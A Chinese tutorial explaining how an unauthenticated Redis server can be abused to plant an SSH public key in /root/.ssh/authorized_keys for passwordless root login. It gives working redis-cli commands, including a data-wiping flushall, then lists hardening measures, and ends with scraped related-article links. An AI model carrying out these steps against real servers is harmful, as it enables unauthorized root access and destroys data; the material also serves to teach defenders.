通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆

步骤:
一、生成本地ssh公钥

ssh-keygen

二、先连接redis看看

telnet 192.168.88.136 6379
redis-cli -h 192.168.88.136

三、清一下redis数据库

redis-cli -h 192.168.88.136 flushall

四、向redis写自己的公钥

cat id_rsa.pub | redis-cli -h 192.168.88.136 -x set redis

五、利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.88.136
#查看keys
192.168.88.136>keys *
#写入配置库的路径及存放位置
192.168.88.136>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.88.136>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.88.136>save
#退出
192.168.88.136>exit

六、远程连接

ssh root@192.168.88.136

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件,以及redis可以默认的可以随意访问性的。

防止redis入侵服务器的措施:

1、不要对外开放redis,也就是不要使用公网ip启动redis
2、更改redis默认的端口(默认是6379)
3、给reids加密码,在启动的以后,我们必须通过密码认证后才能操作
4、给 authorized_keys 文件加上特殊权限(chattr +i authorized_keys),不让别人在里面写内容
5、也可以给/root/.ssh 这个目录加上特殊权限(chattr +i /root/.ssh),这样即使是root用户也不能够在里面写东西

备注:
如果给redis加了密码以后,我们在启动的时候可以这样 redis-cli -h 192.168.88.136 -p 端口 -a 密码,也可以通过先登陆后认证的方式,也就是redis-cli -h 192.168.88.136 -p 端口 ,认证auth 密码
关闭的时候也一样redis-cli -h 192.168.88.136 -p 端口 -a 密码 shutdown

通过Redis入侵服务器相关推荐

  1. python如何入侵服务器的_通过redis入侵服务器的步骤

    通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key.然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件. ...

  2. Linux挖矿病毒排查(通过redis入侵服务器原理)

    入侵原理 攻击者通过redis连接服务器在服务器上写入ssh免密登录的公钥 1.生成 ssh 公私钥文件, 写入待发送文件* ssh-keygen -t rsa -C "xxx"* ...

  3. [ 搭建Redis本地服务器实践系列三 ] :图解Redis客户端工具连接Redis服务器

    原文:[ 搭建Redis本地服务器实践系列三 ] :图解Redis客户端工具连接Redis服务器 上一章 [ 搭建Redis本地服务器实践系列二 ] :图解CentOS7配置Redis  介绍了Red ...

  4. redis多服务器共享_【数据库】Redis(二)持久化及事务

    Redis的数据持久化 Redis是基于内存对数据操作的数据库,计算机重启后,内存中的数据就会丢失,所以redis提供了持久化的功能,可以将redis操作的内存中数据持久化到本地的硬盘中.在redis ...

  5. redis入门——服务器篇

    redis入门--服务器篇 @(Redis)[服务器, 配置文件, 发布订阅, 事务] redis入门服务器篇 redis服务器配置文件 redis服务器基本命令 redis服务器的持久化 RDB持久 ...

  6. 入侵服务器挖矿和诈骗事件频发 | 零时科技区块链安全周报

    入侵服务器挖矿和诈骗事件频发 | 零时科技区块链安全周报 据 零时科技 区块链安全威胁情报平台 数据统计,上周整个区块链生态被公开的区块链安全事件共12起.主要攻击类型分为入侵服务器挖矿攻击和诈骗两种 ...

  7. 云服务器 ECS,RDS,Redis,SLB服务器建站流程

    搭建服务器网站,首先要购买一台云服务器,云服务器有很多不同的规格,分别满足不同的需求,你可以根据应用场景,不同业务负载下的性能需求来选购,选购请参考地址,java开发一般选用linux服务器 ECS配 ...

  8. Redis 多服务器集群搭建

    Redis 多服务器集群搭建 近期,想到之前使用的Redis集群测试使用的是单服务器上的伪集群,重温<Redis深度历险-核心原理与应用实践>的案例,觉得还是搭建一下多服务器集群来玩一玩会 ...

  9. redis跨服务器迁移数据

    redis跨服务器迁移数据 在此之前使用看有人用脚本做数库迁移,自己试了下,体验极差,各种问题. 现在发现了好用的方法.使用redis-port 来做,非常简单快捷 前提条件 拥有源redis服务器的 ...

  10. linux 关闭redis 命令_linux关闭redis命令 redis配置redis的服务器启动和关闭 - Redis - 服务器之家...

    linux关闭redis命令 redis配置redis的服务器启动和关闭 发布时间:2017-04-13 来源:服务器之家 # chkconfig: 2345 10 90 # description: ...

最新文章

  1. Spring配置文件-Bean生命周期配置(init-method方法,destory-method方法)
  2. python软件如何安装方法_【新手必看】Python软件下载及安装教程
  3. 首次公开!《阿里计算机视觉技术精选》揭秘前沿落地案例
  4. VBS操作IE ---(【当不使用IE时】可以使用Chrome插件,自定义JS插件操作浏览器)
  5. 简单实践GraphEmbedding图嵌入的几种方法
  6. linux下的多线程,linux下的多线程
  7. L298N电机驱动模块的简单介绍
  8. 《乔布斯传》阅读笔记
  9. tar.gz和tar.bz2解压命令
  10. 问题记录-Access数据库运行查询语句需要输入参数
  11. 网络靶场攻防综合实验
  12. android设备登录是什么手机_Android手机丢失或被盗?现在就告诉你如何找回它
  13. jquery.seat-chartsMark在线选座插件使用
  14. 人工智能与算法学习总结报告!(珍藏版)
  15. 百度首页HTML(简单代码)
  16. Django+bootstrap启动登录模板页面(Django第三篇)
  17. 本地电脑连接windows云服务器
  18. 美妆科技:改变美容行业的未来
  19. Sass系统技术选型笔记(2)JBPM
  20. kubectl命令使用滚动更新和回滚

热门文章

  1. 32. Make Sure public inheritance models is-a.
  2. 解除宝塔面板强制绑定手机号教程
  3. 陶哲轩实分析(上)8.2及习题-Analysis I 8.2
  4. 求助文,缺少stubs-n32_hard.h
  5. ARCGIS坐标和CAD坐标显示,以及坐标之间的转换
  6. 微信跳一跳小游戏使用charles抓包工具改分攻略
  7. passing '' as 'this' argument discards qualifiers [-fpermissive]
  8. 腾讯云服务器价格明细表(CPU内存/带宽/磁盘)
  9. 【微信支付】微信支付之 Native 支付
  10. 一文搞懂 RabbitMQ 延时队列(订单定时取消为例)